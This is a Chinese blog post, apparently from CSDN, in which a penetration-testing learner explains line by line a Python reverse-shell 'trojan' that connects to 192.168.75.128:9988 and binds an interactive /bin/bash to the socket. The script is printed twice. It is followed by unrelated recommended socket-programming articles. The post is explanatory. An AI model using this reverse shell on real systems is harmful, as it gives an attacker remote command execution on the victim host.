简单理解socket(socket.AF_INET,socket.SOCK_STRE,os.dup2(s.fileno(),0),subprocess.call([“/bin/bash“,“-i“])

最新推荐文章于 2024-08-29 10:05:04 发布
最新推荐文章于 2024-08-29 10:05:04 发布
阅读量1.2w 收藏 62
点赞数 24
分类专栏: 学习 代码原理 文章标签: socket 安全 经验分享 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liver100day/article/details/116992468
版权

前言:因为最近学习渗透时,使用python编写了一个木马,但是对里面的函数/方法功能并不了解,于是查阅资料,总算有了一定了解,于是记录下来
木马文件如下:

import socket,subprocess,os 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
s.commect(("192.168.75.128",9988)) 
os.dup2(s.fileno(),0) 
os.dup2(s.fileno(),1) 
os.dup2(s.fileno(),2) 
p=subprocess.call(["/bin/bash","-i"])

socket

在任何类型的通信开始之前,网络应用程序都必须创建套接字

socket一般指套接字,套接字最初是为同一主机上的应用程序所创建,使得主机上运行的一个程序(又名一个进程)与另一个运行的程序进行通信。这就是所谓的进程间通信(Inter Process Communication,IPC),但是后面随着网络的不断发展,socket也在不断地更新,进而形成了现在可以实现不同主机之间进行通信的工具。

有两种类型的套接字:基于文件的和面向网络的

基于文件的套接字
家族名:AF_UNIX,(又名AF_LOCAL,在POSIX1.g标准中指定),它代表地址家族(addressfamily):UNIX。
其他比较旧的系统可能会将地址家族表示成域(domain)或协议家族(protocolfamily),并使用其缩写PF而非AF。
类似地,AF_LOCAL(在2000~2001年标准化)将代替AF_UNIX
基于网络的套接字
家族名:AF_INET,或者地址家族:因特网。另一个地址家族AF_INET6用于第6版因特网协议(IPv6)寻址。
此外,还有其他的地址家族,这些要么是专业的、过时的、很少使用的,要么是仍未实现的。在所有的地址家族之中,目前AF_INET是使用
得最广泛的

面向连接的套接字与无连接的套接字

面向连接的套接字

TCP套接字的名字SOCK_STREAM,特点:可靠,开销大

在进行通信之前必须先建立一个连接,该连接的通信提供序列化的、可靠的和不重复的数据交付,而没有记录边界。这种类型的通信也称为虚拟
电路或流套接字。
实现这种连接类型的主要协议是传输控制协议(缩写 TCP)。为了创建 TCP套接字,必须使用 SOCK_STREAM 作为套接字类型。
无连接的套接字

UDP套接字的名字SOCK_DGRAM,特点:不可靠(局网内还是比较可靠的),开销小

与虚拟电路形成鲜明对比的是数据报类型的套接字,它是一种无连接的套接字。
在通信开始之前并不需要建立连接。此时,在数据传输过程中并无法保证它的顺序性、可靠性或重复性。数据报确实保存了记录边界,这就意味
着消息是以整体发送的,而并非首先分成多个片段。实现这种连接类型的主要协议是用户数据报协议(缩写 UDP)。为了创建UDP套接字,必须
使用SOCK_DGRAM作为套接字类型。

了解了这些,**socket(socket.AF_INET,socket.SOCK_STRE)**这句的意思这下就可以理解了
创建一个基于网络并且使用tcp协议的套接字,用于通信

我们知道同一主机的两个进程如果需要进行通讯最基本的一个前提是能够唯一的标示一个进程,在本地进程通讯中我们可以使用PID来唯一标示一个进程,但PID只在本地唯一,网络中的两个进程PID冲突几率很大,这时候我们需要另辟它径了。我们知道IP层的ip地址可以唯一标示主机,而TCP层协议和端口号可以唯一标示主机的一个进程,这样我们可以利用ip地址+协议+端口号唯一标示网络中的一个进程。

socket(socket.AF_INET,socket.SOCK_STRE)
s.commect(("192.168.75.128",9988))

于是这两句代码应运而生,IP地址(192.168.75.128),协议(tcp),端口号(9988),这样我们就可唯一标识网络中的一个进程,实现不同主机之间相互通信

os

os.dup2

os.dup2() 方法用于将一个文件描述符 fd 复制到另一个 fd2

dup2()方法语法格式如下:

os.dup2(fd, fd2);

fd – 要被复制的文件描述符
fd2 – 复制的文件描述符

fileObject.fileno()

fileno() 方法返回一个整型的文件描述符(file descriptor FD 整型),可用于底层操作系统的 I/O 操作

fileno() 方法语法如下:

fileObject.fileno();

fd1和fd2(fd1是必须存在的),如果fd2存在,就关闭fd2,然后将fd1代表的那个文件强行复制给fd2,fd2这个文件描述符不会发生变化,但是fd2指向的文件就变成了fd1指向的文件。 这个函数最大的作用是重定向。

linux shell下常用的文件描述符是:
1.  标准输入   (stdin) :代码为 0 ,使用 < 或 << 

2.  标准输出   (stdout):代码为 1 ,使用 > 或 >>  

3.  标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>

了解了这些,就很好理解了

os.dup2(s.fileno(),0) 
os.dup2(s.fileno(),1) 
os.dup2(s.fileno(),2)

使用fileObject.fileno()返回一个整型的文件描述符,并使用os.dup2(s.fileno(),0)把这个整型的文件描述符复制到后面的0
三个dup2函数先后将socket重定向到标准输入,标准输入,标准错误输出。

subprocess

subprocess.call

作用:执行由参数提供的命令,返回命令的状态,0或者非0
subprocess模块允许您生成新进程,连接到它们的输入/输出/错误管道,并获取它们的返回码

/bin/bash

bash是shell的一种,是linux下最常用的一种shell

subprocess.call(["/bin/bash","-i"])

生成一个新进程,并连接到交互式shell(/bin/bash)

import socket,subprocess,os 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
s.commect(("192.168.75.128",9988)) 
os.dup2(s.fileno(),0) 
os.dup2(s.fileno(),1) 
os.dup2(s.fileno(),2) 
p=subprocess.call(["/bin/bash","-i"])

将内容整合起来,这个程序的作用是:创建一个基于网络并使用tcp协议的套接字,赋予它ip和端口号,配合tcp协议来唯一标识192.168.75.128这台主机使用9988端口的进程,建立了一个子进程,传入参数“-i”,使bash以交互模式启动。这个时候我们的输入输出都会被重定向到socket,就可以执行命令了

还可以这样理解:创建一个可交互的bash和一个到192.168.75.128的TCP连接,然后将bash的输入输出错误都重定向到在192.168.75.128占用9988端口的进程上。这样理解更简短,清晰。

后言:最近一直在学习,但是学习的东西很多很杂,于是便把自己的学习成果记录下来,便利自己,帮助他人。希望本篇文章能对你有所帮助,有错误的地方,欢迎指出!!!喜欢的话,不要忘记点赞哦!!!

liver100day
关注
专栏目录
简单理解socketAF_INET&SOCK_STREAM,SOCK_DGRAM)
博客
11-17 5万+
套接字 在任何类型的通信开始之前,网络应用程序都必须创建套接字。 套接字最初是为同一主机上的应用程序所创建,使得主机上运行的一个程序(又名一个进程)与另一个运行的程序进行通信。这就是所谓的进程间通信(Inter Process Communication,IPC) 有两种类型的套接字:基于文件的和面向网络的。 基于文件的 家族名:AF_UNIX (又名AF_LOCAL,在POSIX1.g...
python socket编程详细介绍
weixin_34112900的博客
12-12 4210
Python 提供了两个基本的 socket 模块。    第一个是 Socket,它提供了标准的 BSD Sockets API。    第二个是 SocketServer, 它提供了服务器中心类,可以简化网络服务器的开发。下面讲的是Socket模块功能1、Socket 类型套接字格式:socket(family,type[,protocal]) 使用给定的地址族、套接字类型、协议编号(默认为0...
Python网络编程:socket库详解
最新发布
零度°C的博客
08-29 584
Python中,socket库提供了访问底层网络接口的方式,允许程序创建用于TCP/IP网络通信的套接字(socket)。通过这个库,可以实现客户端和服务器之间的网络通信。socket
socket(AF_INET, SOCK_STREAM…
一马行千里的博客
08-27 7230
Issue: socket(AF_INET, SOCK_STREAM, IPPROTO_IP);  总是返回-1 Code: (省略了头文件的引用) int _tmain(int argc, _TCHAR* argv[]) {     int socketId;     socketId = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);     cout
AF_INET域与AF_UNIX域socket通信原理对比
热门推荐
sandware的专栏
11-08 3万+
1.  AF_INETsocket通信过程 典型的TCP/IP四层模型的通信过程。 发送方、接收方依赖IP:Port来标识,即将本地的socket绑定到对应的IP端口上,发送数据时,指定对方的IP端口,经过Internet,可以根据此IP端口最终找到接收方;接收数据时,可以从数据包中获取到发送方的IP端口。 发送方通过系统调用send()将原始数据发送到操作
socket函数
panda的专栏
12-23 1067
SOCKET()我们使用系统调用socket()来获得文件描述符:#include#includeint socket(int domain,int type,int protocol);第一个参数domain设置为“AF_INET”。第二个参数是套接口的类型:SOCK_STREAM或SOCK_DGRAM。第三个参数设置为0。系统调用socket()只返回一个套接口描述符,如果出错,则返回
Socket编程(C语言实现)——TCP协议(网络间通信AF_INET)的流式(SOCK_STREAM)+报式(SOCK_DGRAM)传输
m0_67403272的博客
08-24 4188
① 所谓Socket通常也称作“套接字”,用于描述IP地址和端口,是一个通信链的句柄。应用程序通常通过“套接字”向网络发出请求或者应答网络请求。② Socket是连接运行在网络上的两个程序间的双向通信的端点。③ 网络通讯其实指的就是Socket间的通讯。④ 通讯的两端都有Socket,数据在两个Socket之间通过IO来进行传输。
socket(AF_INET,SOCK_STREAM,0)
weixin_34148456的博客
09-24 4051
2019独角兽企业重金招聘Python工程师标准>>> ...
LWIP相关概念(2)
zhenqi2009的专栏
09-29 293
在LWIP的第三种SOCKET接口中,需要使用常用的SOCKET编程接口: socketbind、listen、connect、accept、send、sendto、recv、recvfrom、close、shutdown 常用socket函数详解 常用的函数讲解 在 LWIP下使用 <socket.h> 头文件中 socket() 函数来创建套接字,原型为: int so...
API_SOCKET.rar_API sock_API. socket_API_SOCKET_api socket_socket
09-24
1. 创建套接字:使用`socket()`函数创建一个新的套接字,指定协议族(如AF_INET表示IPv4,AF_INET6表示IPv6)和套接字类型。 2. 绑定:使用`bind()`函数将套接字与本地IP地址和端口号关联起来。 3. 监听:对于服务器...
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
01-30
`socket.socket(socket.AF_INET, socket.SOCK_DGRAM)`是用于创建基于UDP的socket对象。下面是一个示例代码: ```python import socket s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) ``` 这段代码创建了...
socket网络编程
01-27
一个简单socket网络编程例子: 服务器代码: #include #include #include #include #pragma comment(lib,"ws2_32.lib") //这句话的意思是加载ws2_32.lib这个静态库 #define NETWORK_EVENT WM_USER+100 //如果你用mfc做开发,你可以点击菜单project-〉setting-〉link-〉object/library中添加这个静态库。 //如果你用c语言,你需要通过#pragma comment(命令来连接静态库 int main(int argc, char* argv[]){ HANDLE hThread = NULL; //判断是否输入了端口号 if(argc!=3){ printf("Usage: %sPortNumber\n",argv[1]); exit(-1); } //把端口号转化成整数 short port; if((port = atoi(argv[2]))==0){ printf("端口号有误!"); exit(-1); } WSADATA wsa; //初始化套接字DLL if(WSAStartup(MAKEWORD(2,2),&wsa)!=0){ //高字节指定了次版本号,低字节指定了主版本号,两个字节加到一起,就是你想要的Winsock库的版本号了 printf("套接字初始化失败!"); exit(-1); } //创建套接字 SOCKET serverSocket; if((serverSocket=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET){ printf("创建套接字失败!"); exit(-1); } struct sockaddr_in serverAddress; memset(&serverAddress,0,sizeof(sockaddr_in)); serverAddress.sin_family=AF_INET; serverAddress.sin_addr.S_un.S_addr = htonl(INADDR_ANY); serverAddress.sin_port = htons(port); //绑定 if(bind(serverSocket,(sockaddr*)&serverAddress,sizeof(serverAddress))==SOCKET_ERROR){ printf("套接字绑定到端口失败!端口: %d\n",port); exit(-1); } //进入侦听状态 if(listen(serverSocket,SOMAXCONN)==SOCKET_ERROR){ printf("侦听失败!"); exit(-1); } printf("Server %d is listening......\n",port); SOCKET clientSocket[5],maxSocket;//用来和客户端通信的套接字 struct sockaddr_in clientAddress;//用来和客户端通信的套接字地址 memset(&clientAddress,0,sizeof(clientAddress)); int addrlen = sizeof(clientAddress); fd_set fd_read; int i=0; int j; char buf[4096]; char buff[4096]="exit"; while(1) { FD_ZERO(&fd_read); maxSocket=serverSocket; FD_SET(serverSocket,&fd_read); //FD_SET(clientSocket[i-1],&fd_read); for(j=0;j<i;j++) { FD_SET(clientSocket[j],&fd_read); if(maxSocket"); //gets(buff); if(select(maxSocket+1,&fd_read,NULL,NULL,NULL)>0) { if(FD_ISSET(serverSocket,&fd_read)) { if(buff=="") { if((clientSocket[i++]=accept(serverSocket,(sockaddr*)&clientAddress,&addrlen))==INVALID_SOCKET) { printf("接受客户端连接失败!"); exit(-1); } else { for(j=0;j5) { printf("超过最大客户端数"); exit(-1); } } else { int bytes; for(int k=0;k<i;k++) { if(FD_ISSET(clientSocket[k],&fd_read)) { bytes=recv(clientSocket[k],buf,sizeof(buf),0); if(bytes==-1) { //listen(serverSocket,SOMAXCONN); for (int l=k;l<i;l++) clientSocket[l]=clientSocket[l+1]; i--; } /*if(bytes==0) { //printf("fdsdf"); listen(serverSocket,SOMAXCONN); for (int l=k;l0) { buf[bytes]='\0'; printf("Message from %s: %s\n",inet_ntoa(clientAddress.sin_addr),buf); if(send(clientSocket[k],buf,bytes,0)==SOCKET_ERROR) { printf("发送数据失败!"); exit(-1); } } } } } } } //清理套接字占用的资源 WSACleanup(); return 0; } 客户端代码: #include #include #include #pragma comment(lib,"ws2_32.lib") int main(int argc, char* argv[]){ //判断是否输入了IP地址和端口号 if(argc!=4){ printf("Usage: %s IPAddress PortNumber\n",argv[1]); exit(-1); } //把字符串的IP地址转化为u_long unsigned long ip; if((ip=inet_addr(argv[2]))==INADDR_NONE){ printf("不合法的IP地址:%s",argv[1]); exit(-1); } //把端口号转化成整数 short port; if((port = atoi(argv[3]))==0){ printf("端口号有误!"); exit(-1); } printf("Connecting to %s:%d......\n",inet_ntoa(*(in_addr*)&ip),port); WSADATA wsa; //初始化套接字DLL if(WSAStartup(MAKEWORD(2,2),&wsa)!=0){ printf("套接字初始化失败!"); exit(-1); } //创建套接字 SOCKET sock,serverSocket; if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET){ printf("创建套接字失败!"); exit(-1); } struct sockaddr_in serverAddress; memset(&serverAddress,0,sizeof(sockaddr_in)); serverAddress.sin_family=AF_INET; serverAddress.sin_addr.S_un.S_addr = ip; serverAddress.sin_port = htons(port); //建立和服务器的连接 if(connect(sock,(sockaddr*)&serverAddress,sizeof(serverAddress))==SOCKET_ERROR) { printf("建立连接失败!"); exit(-1); } char buf[4096]; while(1){ printf(">"); //从控制台读取一行数据 gets(buf); if(send(sock,buf,strlen(buf),0)==SOCKET_ERROR){ printf("发送c数据失败!"); exit(-1); } int bytes; if((bytes=recv(sock,buf,sizeof(buf),0))==SOCKET_ERROR) { printf("接收c数据失败!\n"); exit(-1); } else { buf[bytes]='\0'; printf("Message from %s: %s\n",inet_ntoa(serverAddress.sin_addr),buf); } } //清理套接字占用的资源 WSACleanup(); return 0; }
socket_test.zip_socket php_测试socket 读写
09-21
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); ``` 参数分别为地址族(AF_INET表示IPv4),Socket类型和协议(SOL_TCP代表TCP)。 3. **连接Socket**: 对于服务器端,使用`socket_bind()`绑定...
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
10-05
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) 是创建一个原始套接字的例子。其中,socket.AF_INET指定了套接字使用IPv4协议,socket.SOCK_RAW指定了套接字类型为原始套接字,socket...
linux socket sin_addr.s_addr,请教:一个linux下socket编程的问题!
weixin_35764532的博客
05-15 1970
写了一段程序,想实现以下功能:客户端向服务器发送数据,服务器收到数据后打印出客户端的IP地址和发送数据的端口号,并且发送一个回复信息到这个IP和端口号。服务器的ip是211.84.93.111。用5060端口接收数据(客户端和服务器运行于同一台机器上)。但是运行的时候出现了下面的问题:1先运行server程序,再运行client程序。第一次运行client时server给出的ip和端口号总是不...
Socket-python网络编程
qq_53790158的博客
05-23 425
socket(“套接字”),用来建立通信,分为服务器端和客户端。 socketpython自带的一个模块。 一、使用(导包) import socket 二、初始化socket对象 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) .AF_INET (IPV4 默认) .AF_INET6 (IPV6) .AF_UNIX (只能够用于单一的Unix系统进程间通信) 三、操作(客户端、服务器端) 客户端和服务器端的操作
【网络编程学习记录2】socket()函数用法详解:创建套接字_socket(af_inet,0, 0)(1)
2401_84265634的博客
04-15 1297
正如大家所想,一般情况下有了 af 和 type 两个参数就可以创建套接字了,操作系统会自动推演出协议类型,除非遇到这样的情况:有两种不同的协议支持同一种地址类型和数据传输类型。例如,PF_INET 等价于 AF_INET,PF_INET6 等价于 AF_INET6。
Python3之socket编程
weixin_43102784的博客
10-14 588
Python3之socket编程解决粘包问题 什么是粘包 当发送网络数据时,tcp协议会根据Nagle算法将时间间隔短,数据量小的多个数据包打包成一个数据包,先发送到自己操作系统的缓存中,然后操作系统将数据包发送到目标程序所对应操作系统的缓存中,最后将目标程序从缓存中取出,而第一个数据包的长度,应用程序并不知道,所以会直接取出数据或者取出部分数据,留部分数据在缓存中,取出的数据可能第一个数据包和第...
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值